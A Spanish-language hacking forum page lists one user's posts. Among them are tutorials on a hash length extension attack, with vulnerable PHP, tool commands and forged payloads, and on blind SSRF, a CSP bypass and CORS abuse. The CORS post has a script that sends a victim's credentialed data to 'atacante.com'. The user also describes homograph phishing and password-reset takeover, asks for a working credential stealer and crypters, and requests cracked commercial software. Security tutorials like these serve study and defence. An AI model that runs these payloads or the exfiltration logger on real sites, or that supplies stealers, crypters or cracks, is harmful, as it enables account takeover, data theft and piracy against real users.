Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - arthusu

#1
Pentesting / Ataque de extension de longitud
Enero 15, 2019, 01:34:51 AM
¿Que es?

En criptografía y seguridad informática, un ataque de extensión de longitud es un tipo de ataque en el que un atacante puede usar el hash y la longitud del mensaje, para calcular el hash de un mensaje controlado por el atacante.

Código de ejemplo:

Código: php
<?php

$secret = md5('arthusu');

if(isset($_GET['user']))
{
echo md5($secret . ':user');
exit;
}

if(isset($_GET['admin']))
{
echo md5($secret . ':admin');
}

$signature = md5($secret . ':' . $_GET['type']);

if($signature == $_GET['sig'])
{
$data = explode(':', $_GET['type']);

if(end($data) == 'admin')
{
echo 'Tu eres administrador';
}
else
{
echo 'Tu eres un usuario';
}
}
else
{
echo 'Firma invalida';
}

?>




Uso:


?user - pedimos la firma para el usuario



?admin - pedimos la firma para el administrador


?sig=xxxx&type=user – donde sig es la firma obtenida y el type el tipo de usuario



En caso de que la palabra no coincida con la firma generada nos va mostrar un mensage un mensaje de error.



?sig=xxx&type=admin – nos muestra el usuario administrador

Explotación

Haremos uso de un script:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Hash extender en este caso soporta los siguientes hashes para su explotación:

CRC32, MD5, SHA1, SHA256 y SHA512

Ahora identificamos el hash No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Introducimos el hash: 38f7e2f0c5eba427ed6b4b47f24814ea (en mi caso es este) y 0/GetImage%2B%25286%2529.png[/img]

Generamos una nueva firma

arthusu@SEGINF-RED03:/mnt/c/users/jaesoto/hash_extender$ ./hash_extender -f md5 -s 38f7e2f0c5eba427ed6b4b47f24814ea  --data 'user' --append ':admin' --secret-min=7 --secret-max=33 --out-data-format=html

Código: text


Type: md5

Secret length: 7

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 8

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 9

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00h%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 10

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00p%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 11

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00x%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 12

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 13

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%88%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 14

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 15

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%98%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 16

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 17

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%a8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 18

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 19

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 20

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 21

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 22

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 23

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%d8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 24

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 25

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 26

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 27

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f8%00%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 28

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 29

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%08%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 30

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%10%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 31

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 32

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00+%01%00%00%00%00%00%00%3aadmin

 

Type: md5

Secret length: 33

New signature: 12005b20185a5b3feb166cf9017ffa56

New string: user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%28%01%00%00%00%00%00%00%3aadmin


Donde los parámetros son los siguientes:

-f xxx le indicamos el tipo de hash

-s xxxx le indicamos la firma que tenemos valida

--data 'xxx' le indicamos el dato conocido en este caso user

--append 'xxx' le indicamos el dato que queremos agregarle en este caso :admin con dos puntos por el explode en este caso 

--out-data-format=xxx le indicamos el formato de salida que le va dar

--secret-min=numero le indicamos un numero de tamaño para el secreto como minimo

--secret-max=numero le indicamos un numero de tamaño para el secreto como maximo



El secreto es en lo que se basa este ataque el tamaño del mismo como en este caso hipotéticamente no sabemos su tamaño (aunque si sabemos que la $signature tiene 32 caracteres el tamaño 😉 ) entonces generamos un rango en este caso del 7 al 33 y comenzamos a probar... 1 por 1.



Para realizar la prueba con hashpump lo hacemos de la siguiente manera:


arthusu@SEGINF-RED03:~$ hashpump

Código: text
Input Signature: 38f7e2f0c5eba427ed6b4b47f24814ea 

Input Data: :user

Input Key Length: 32

Input Data to Add: :admin

12005b20185a5b3feb166cf9017ffa56

:user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin


Como vemos ingresamos la firma con la comenzamos 38f7e2f0c5eba427ed6b4b47f24814ea

Después el dato con el que comenzamos user

Y el tamaño de la firma en este caso 32

Por ultimo el input agregar es :admin el cual esta en un explode por eso : sino fuera el caso no se agrega



Nos da una nueva firma: 12005b20185a5b3feb166cf9017ffa56

Y un payload: :user\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00:admin



El cual transformamos \x a % quedando asi: 


user%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00(%01%00%00%00%00%00%00:admin

Al ejecutar el payload nos da el resultado correcto.


Conclusión:


Estas vulnerabilidades existen realmente en las aplicaciones web, un ejemplo claro de ello lo podemos encontrar en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dudas y sugerencias pueden comentar, saludos

Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Hacking ShowOff / [Blind SSRF] Underc0de.org y SMF 2.1
Octubre 27, 2018, 08:03:29 PM
Anteriormente hice un post sobre este ataque en un blog de un amigo, les dejo el enlace para que le peguen una leída.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En la pagina oficial de github de SMF viene el siguiente código:



lo que hace aquí es que parsea la url luego manda a pedir por una funcion llamada fetch_web_data()



viendo el código vemos que valida si la url es http, https o ftp.



En caso de que sea http abre socket y realiza la petición. Ok hasta aquí no veo que blacklistee o tenga una whitelist de puertos, o solo servidores de imágenes aceptadas, por lo cual puedes poner cualquier URL sera aceptada.

Con esto comenzaremos el ataque, abriré burp collaborator client:



Copiare la URL que me genera, y la pondré en la parte de ataque que es donde ponemos la URL.



le podemos indicar el puerto en este caso el puerto 80.

Verificamos en burp collaborator que la petición se realiza correctamente, podemos darle poll now para un refresco.



Ahora haremos el Poc, verificamos puertos abiertos de la pagina nmap con nmapxD:



ok sabiendo esto podemos realizar la petición usando Burp Repeater:



Aquí sabemos que el puerto esta abierto por que la respuesta fue 302 found y tardo poco tiempo en responder



Aqui sabemos que el puerto esta cerrado por que la respuesta fue 302 found y tardo mucho tiempo en responder

Tambien existe otro caso en el cual un puerto esta abierto pero tarda mucho en responder y esto pasa por que la coneccion sigue viva:



y termina dando un resultado sin respuesta:



Esto seria todo, creo que se pueden realizar mas cosas pero no estoy seguro, un ataque Dos por ejemplo dejando sockets abiertos o pidiendo un string muy lardo, en este caso no pude ver nada de la red interna por que no se ve reflejado en el body como tal la respuesta. Si alguien tiene alguna idea de como explotar esta vulnerabilidad en este caso mas a fondo que me la haga saber o si me equivoco tambien, saludos
#3
Pentesting / Usando Burp con TOR
Septiembre 30, 2018, 12:50:22 PM
Buenas amigos esto es algo fácil de hacer así que espero hacerlo por pasos y si agregar unas cuantas imágenes.


1.- descargamos TOR: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2.- abrimos el navegador de tor vamos a opciones>proxy de red>Configuración... Verificamos el HOST SOCK en mi caso esta así: IP: 127.0.0.1 PUERTO: 9150



3.- ahora abro mozilla firefox e ingreso lo siguiente:



4.- Me dirijo a Burp>User options>SOCKS Proxy>Ingreso proxy:
IP: 127.0.0.1 PORT: 9150

Seleccionamos la opción: Use SOCKS Proxy y tambien Do DNS Lookups over Sock Proxy.



5.- Ingreso a Mi firefox y hago peticiones por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#4
Pentesting / Como saltar CSP (Content Security Policy)
Septiembre 30, 2018, 12:47:32 PM
Introduccion

La política de seguridad de contenido (CSP) es un estándar de seguridad informática introducido para evitar la secuencia de comandos (XSS), clickjacking y otros ataques de inyección de código resultantes de la ejecución de código malicioso en el contexto confiable de la pagina web.

Detectando CSP




Primeramente vemos una URL que puede ser posiblemente atacada por XSS. Y hacemos la prueba:




Vemos como se inyecta nuestro codigo pero no se ejecuta entonces, vamos al apartado de Network de nuestro inspeccionador de elementos y vemos lo siguiente:



Un mensaje de error que nos indica claramente como content security police nos esta bloqueando y que solo permite ejecutar scripts del mismo dominio.

Atacar!

El siguiente paso es buscar alguna parte donde se refleje nuestro XSS ya sea un alert, prompt, confirm, etc... puede llegar a ser una imagen, un archivo js, etc...

Primero hay que ver cuales son los dominios que permite para ello vamos hacemos una peticion y vemos la respuesta:




Vemos claramente como se puede solamente inyectar script que sean del mismo dominio. Ejemplo de un vector:

Código: php
<script src="http://pentesterlab.com/arthusublog.js?var=alert(1);" />


Donde alert(1) se refleja en el JS.




Inyectando el vector en donde se encuentra el XSS podemos realizar el bypass:

#5
¿Que es Selenium?

Selenium automatiza los navegadores. ¡Eso es! Lo que hagas con ese poder depende totalmente de ti. Principalmente, es para automatizar aplicaciones web con fines de prueba, pero ciertamente no se limita a eso. Las tareas de administracion aburridas basadas en la web pueden (y deberian) ser automatizadas tambien.

Selenium tiene el soporte de algunos de los proveedores mas grandes de navegadores que han tomado (o están tomando) pasos para hacer de Selenium una parte nativa de su navegador. También es la tecnología central en muchas otras herramientas de automatización del navegador, API y frameworks.

¿Que parte de Selenium es apropiada para mi?

Selenium Web Driver

Si quieres:
* Cree robustos paquetes y pruebas de automatizacion de regresion basados en el navegador
* Escalar y distribuir scripts en muchos entornos

Selenium IDE

Si quieres:
* Crear scripts rapidos de reproduccion de errores
* Crear scripts para ayudar en las pruebas exploratorias asistidas por la automatizacion.

Descargar Selenium

Puedes dirigirte a la pagina web de Selenium y en la seccion Download: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Puedes elegir la que mas se adapte a tu proyecto ya sea selenium ide o selenium web driver. En este minitutorial mostraremos algo basico de los dos.


Selenium IDE

En caso de que quieras que sea solamente una accion en especifica siempre la misma accion te recomendaria usar Selenium IDE. El cual se encuentra disponible para firefox y chrome en version complemento, yo utilizare para firefox en este caso:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En el siguiente vídeo veremos como en Selenium entramos a la pagina de mi BLOG, después entramos a una publicación y después volvemos a la pagina inicial, esto es algo básico ya que con Selenium podemos meter datos en un campo, y muchas cosas mas que normalmente podemos hacer manualmente con el navegador.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


También puedes exportar tu código a diferentes partes y hacer mas rápido una ejecución.

Selenium Web Driver

¿Que diferencia hay entre Selenium IDE y Selenium Web Driver?

La mayor diferencia es que con Selenium IDE grabamos las cosas y las reproducimos, pero si quieres que algo sea dinamico y con interaccion debes utilizar programacion y con Selenium Web Driver lo puedes lograr.

Lo primero que debemos realizar es descargarnos el driver de nuestra preferencia se encuentra dentro de la misma pagina oficial de selenium, en mi caso seguire usando firefox:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hay que agregar el driver a variables de entorno.

Y usare tambien el server standalone de selenium en este caso yo utilizare la version 3.8.1:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Utilizare el driver de PHP creado por facebook:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero a realizar es correr mi server standalone de selenium:



Código: php
java -jar selenium-server-standalone-3.8.1.jar -enablePassThrough false


Por ultimo podemos correr nuestro proyecto usando la consola o desde web, no explicare el uso del driver ya que facebook tiene una gran wiki aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por ultimo decirles que con Selenium tenemos una herramienta poderosa para automatizacion de tareas y podriamos hacer cosas grandiosas con el. Un ejemplo:




Por esta introduccion seria todo y les invito a probar Selenium en sus proyectos de automatizacion.[/font]
#6
Hola buenas buenas tiempo sin revisar el foro y estaba viendo que algún contenido todavía es bueno, aunque hay muchos usuarios nuevos que ya no he visto por aquí, quería preguntar sobre una url que encontré creando una herramienta de búsqueda de subdominios, encontré:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y quería saber para cuando esta este proyecto por lanzarse y si serán cursos de pago o normales y si me puedo unir....

y sobre la zona vip quería ver si tenían alguna zona vip donde podamos compartir contenido blackhat, se que el foro es ético y en eso estamos pero una zona vip que no muchas vean y que pueda ser de pago ayudaría al foro y también al staff a publicar mas cosas de interés a todos, no hice una búsqueda antes pero quería ver que opinan sobre esto, saludos
#7
Definición

CORS o intercambio de recursos de origen cruzado, es un mecanismo que permite que recursos restringidos (como por ejemplo, las tipografías) de una pagina web puedan ser solicitados desde un dominio diferente por fuera desde el cual el primer recurso fue expuesto.


Acerca de la vulnerabilidad y como funciona CORS

Los sitios web normalmente habilitan CORS en el mismo origen de la web:

Código: php
Access-Control-Allow-Origin: https://ejemplo.com


Esto significa que las peticiones que hagan ellos desde otro lugar no se ejecutan ya que estas solo se permiten en el origen del encabezado.



En esta imagen podemos ver un ejemplo de como si hacemos una petición que no venga del origen (o que no quiera compartir con ese origen)que le indicamos la respuesta es bloqueada. Pero en dado caso que si queramos compartir con ese origen la respuesta se realiza:



El servidor también puede habilitar lo que son las credenciales utilizando el siguiente encabezado:

Código: php
Access-Control-Allow-Credentials: true



Ahora, cuando confiamos en 1 solo origen es muy fácil, pero que pasa si deseamos confiar en mas origenes, esto se da mucho en las No tienes permitido ver los links. Registrarse o Entrar a mi cuentahoy en dia, en las cabeceras se puede agregar uno o mas origenes utilizando un espacio:

Código: php
Access-Control-Allow-Origin: http://ejemplo1.com http://ejemplo1.net



También se puede hacer uso del comodín * para especificar todos los subdominios, esto no indica que nosotros no podamos crear un subdominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta mientras que este ataque podría permitir ver sus recursos compartidos, o simplemente si el dominio tiene en su lista blanca podemos ponernos a pensar formas de evasión ;).

Código: php
 Access-Control-Allow-Origin: *.ejemplo.com


Esto peligra cuando usamos * en CORS ya que esta es una mala implementacion la cual deshabilita simplemente el uso de las credenciales aunque estas estén en Verdadero, esto lo podemos ver como lo explica la pagina de Mozilla.

Entonces explicando esto, si usted ve un servidor o pagina web que emite la cabecera CORS con * el comodin deja lugar a que un atacante pueda especificar en la cabecera el Origen que el desee tal como:

Código: php
curl https://victima.com -H "Origin: https://atacante.com" -I





Como resultado podemos ver recursos de otros sitios que no deberíamos poder ver.


Atacar CORS? Poc?


Entonces, esto de que me sirve? bueno pues gracias a que podemos hacer peticiones donde no deberíamos podemos simplemente hacer un Logger de peticiones que siempre este a la escucha, o simplemente hacer una petición para ver si funciona.

Primero, hacemos una petición y vemos si acepta nuestro origen.




Y después vemos la respuesta que nos da la cual permite nuestro dominio.




Digamos que esa peticion, es una donde se muestran los datos del usuario asi como sus credenciales.

Podemos hacer un poc y ver como funciona:


Código: javascript
function cors() {
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
       document.getElementById("demo").innerHTML =     alert(this.responseText);
     }
   };
   xhttp.open("GET", "https://target.com/user/", true);
   xhttp.withCredentials = true;
   xhttp.send();
}



Esto nos puede dar como resultado, los datos desde cualquier origen.





Siendo asi podemos crear un logger que nos vaya guardando todos los datos.

Código: javascript
var req = new XMLHttpRequest(); 
req.onload = reqListener;
req.open('get','https://vulnerablecors.com',true);
req.withCredentials = true;
req.send();

  function reqListener() {
     location='http://atacante.com/gracias.php?c='+this.responseText;

  };



Esto es como cuando robas cookies.

El origen Nulo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La especificacion menciona que esta siendo activada por redirecciones, y algunas publicaciones de stackoverflow mustran que los archivos locales HTML tambien la obtienen. Esto hace que muchos sitios web lo tengan en su lista blanca:

Código: php
Origin: null


Entonces esto realmente es explotable?


Gracias No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Conclusión

En conclusion configurar correctamente tus cabeceras tal como CORS puede evitarte que tengas fugas de informacion de tu pagina web y otras personas puedan acceder a tus recursos.



Referencias:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#8
Dudas y pedidos generales / stealer web y crypter
Junio 13, 2018, 02:48:14 PM
hola en mi epoca existia el istealer 6.3 con el cual podias explotar y funcionaba ahora como los navegadores se actualizaron quisiera saber si todavia existe algun stealer como ese web y que funcione si me podrian recomendar alguno...

tambien habian paginas donde podias conseguir crypters no se si todavia anden o me puedan recomendar alguna

quise usar troyanos pero ahora es diferente ya que las compañias te cobran por abrir puertos ahora...

pero me gusta mas que anda que me recomendaran algun stealer web de antemano muchas gracias, saludos
#9
Back-end / Escaner Masivo de Correos
Junio 09, 2017, 01:21:34 PM




Hola no sabia donde postear esto, es una herramienta que hice hace poco a mas de alguno le debe servir es un escaner masivo de correos, lo que hace es verificar si un correo existe en realidad, de esta manera todos los correos validos se guardan en Ver Emails Validos, muestra los correos en tiempo real, y Hace un reset de Mails validos para volver a realizar otro escaneo. Saludos!

PD: cualquier bug avisarme, saludos

Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Hola llevo con esto varios dias,  resulta que tengo un cliente al cual le he formateado ya tres veces un servidor windows server 2008 r2 ... el problema es que al parecer otra maquina infecta el servidor cuando estan en red y no me deja acceder a las carpetas...

* no es firewall
* no es el av
* y las configuraciones estan bien

yo creo que es un virus pero no se de ningun virus que haga eso, si alguien me puede apoyar nombrandome virus que hagan eso para buscar como eliminarlo.... ya que es necesario tener carpetas compartidas en ese servidor por que hay un sistema que utiliza la empresa el cual funciona en red con carpeta compartida, por mientras utilizare terminal Service para que se conecten al servidor... alguien podria apoyarme con esto... Saludos
#11
Hola Underc0de!, cuanto tiempo :P Jeje bueno queria hacerles unas preguntillas para ver si me podrian apoyar con esto les agradeceria de antemano...

Alguien conocera un buen host que ofrezca:

* Soporte PHP ultimas versiones, y librerias como Curl y PDO
* Que sea rapido al momento de cargar
* En donde pueda crear varios dominios y manejar varias webs y que cobre menos para eso :V

Edit: Ya encontre plantillas en el foro :V

Edit2: Al final me decidi por elegir Hostinger, buen servidor actualizado y necesitaba usar varios dominios y el mismo Hosting para que me quedara mas barato todo :)

Si me pudieran ayudar con esto se los agradeceria mucho comunidad! Saludos cordiales a todos :)
#12
Hola amigos!, quisiera saber si pueden ayudarme con esto...



si se fijan en la siguiente imagen hay un rango seleccionado utilizando las herramientas de dibujo de google maps (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

lo que me gustaria saber es alguna forma o si pueden darme algun tip pista, tutorial manual o que leer para poder sacar la superficie y el perimetro del area que seleccione utilizando esta herramienta...

Les estare muy agradecido desde ya gracias
#13
Hola he estado bastante ocupado y no habia tenido chance de publicar en el BLOG, pero ahora les traigo algo que me parecio interesante en estos dias...

Primero que nada vamos con dos definiciones para dejar los puntos importantes claros!
 
Homografo

Que se escribe y se pronuncia exactamente igual que otra pero tiene distinto significado.

Unicode

Es un estandar de codificacion de caracteres diseñado para facilitar el tratamiento informatico, transmision y visualizacion de textos de multiples lenguajes y disciplinas tecnicas, ademas de textos clasicos de lenguas muertas.

Muchas personas usaban estos caracteres unicode, recuerdo en la red de metroflog, para usar sus "caritas lindas" al escribir un mensaje.

Aqui les dejo una tabla unicode con los caracteres mas populares:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Ahora si a lo que vamos...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No se si hayan escuchado el termino "phishing" que es cuando atraes al usuario a entrar a una URL donde esta montado un SCAM (pagina falsa) en la cual tus datos importantes son capturados.

Bueno pues la mayoria de estos sitios son identificados por las URL's que manejan son poco "confiables" o simplemente por que son reportadas como tales (paginas phishing), veamos un ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

seria una url muy parecida a la de facebook exepto que tiene la "l" ahi... esto seria una buena URL para una pagina falsa... pero que pasa si los caracteres no son mas que parecidos visualmente (homografo)... Ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

si miras esa "f" es una F codificada en Unicode... Pero el dominio sigue siendo el mismo... o Parecido visualmente... Por lo cual la gente puede caer en unos de estos ataques rapidamente (Tambien podemos incluir un open redirect una vulnerabilidad comun hoy en dia).
  Les dejo dos paginas para que puedan realizar esto de una manera ilustrativa:
  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   Ahora el otro tipo de ataque que les comentaba era el cambio de contraseñas, por medio de este mismo ataque, hace poco escuche que hicieron un ataque parecido a github.
  Digamos este caso:
  Tenemos un correo que esta registrado en una pagina y se llama:
  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  Entonces, nosotros al poner olvide mi contraseña es obvio que va enviar un codigo... al correo o al numero de telefono asociado a la cuenta.
  En caso de que la aplicacion este mal programada podemos hacer uso de un correo muy parecido visualmente (homografo), ejemplo:
 
arthusu@micorreo.com

Cremos un dominio con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y es obvio que nos llegara un correo con el link para establecer una nueva contraseña.
  Eso es todo en esta entrada, no inclui imagenes, no inclui pruebas, pero les dejo la idea por si alguna vez llegasen a intentar el ataque, no creo que se necesiten pruebas pero por si las dudas...

Un ejemplo de este ataque: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Anteriormente habia un BUG donde podias Reemplazar al usuario de un foro Usando caracteres unicode, ahora ya no existe (eso no dice que pueda existir)...
#14




hola a todos... no se si alguno tendra entre sus cosas el compaq i facturacion electronica y adminpaq crackeado si podria pasarmelo si seria tan amable o algun link?
Estaria agradecido muchas gracias!
#15
Pentesting / Robando el codigo del juaker
Agosto 05, 2016, 02:23:24 AM
No dejare explicacion dejare el video y el link, saludos!



Aqui tienen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#16
hola jaja se que tengo rato que no entro y ahora solo para pedir... :P  ;D

Quisiera saber si hay alguien que me pudiera pasar este tema:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Encontre este:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aunque al parecer no te deja meter todos los menus...

Quisiera saber si alguien me podria ayudar con el tema... Desde ya muchas gracias! C:

Saludos a todos
#17
Resumen rapido

* SOME en Wordpress 4.5.1
* Reportado a finales de abril
* Corregido en Wordpress 4.5.2

  Introduccion

Wordpress 4.5.1 es vulnerable de nuevo a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta vulnerabilidad que se deriva por un proceso de sanatizacion de una URL insegura en el archivo plupload.flash.swf. El codigo en el archivo intenta remover FlashVars en su caso para establecer los parametros por GET pero falla al hacer esto, habilitando XSS via No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

El ataque fue descrito por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. La vulnerabilidad en plupload.flash.swf fue descubierta en abril del 2016, primeramente identificada como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Entonces, despues el team lo reviso, la completa explotacion fue descubierta y analizada por Heiderich, Filedescriptor, Kinugawa and Inführ. Finalmente, es decubierto, que el archivo viene empaquetado en la ultima version de Wordpress y el problema fue reportado via HackerOne por Heiderich et al.

PoC Simple:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un PoC mas complejo fue creado para demostrar el ataque potencial Remote Code Execution (RCE) de esta vulnerabilidad. Una descripcion detallada puede ser encontrada mas abajo:

Código: php
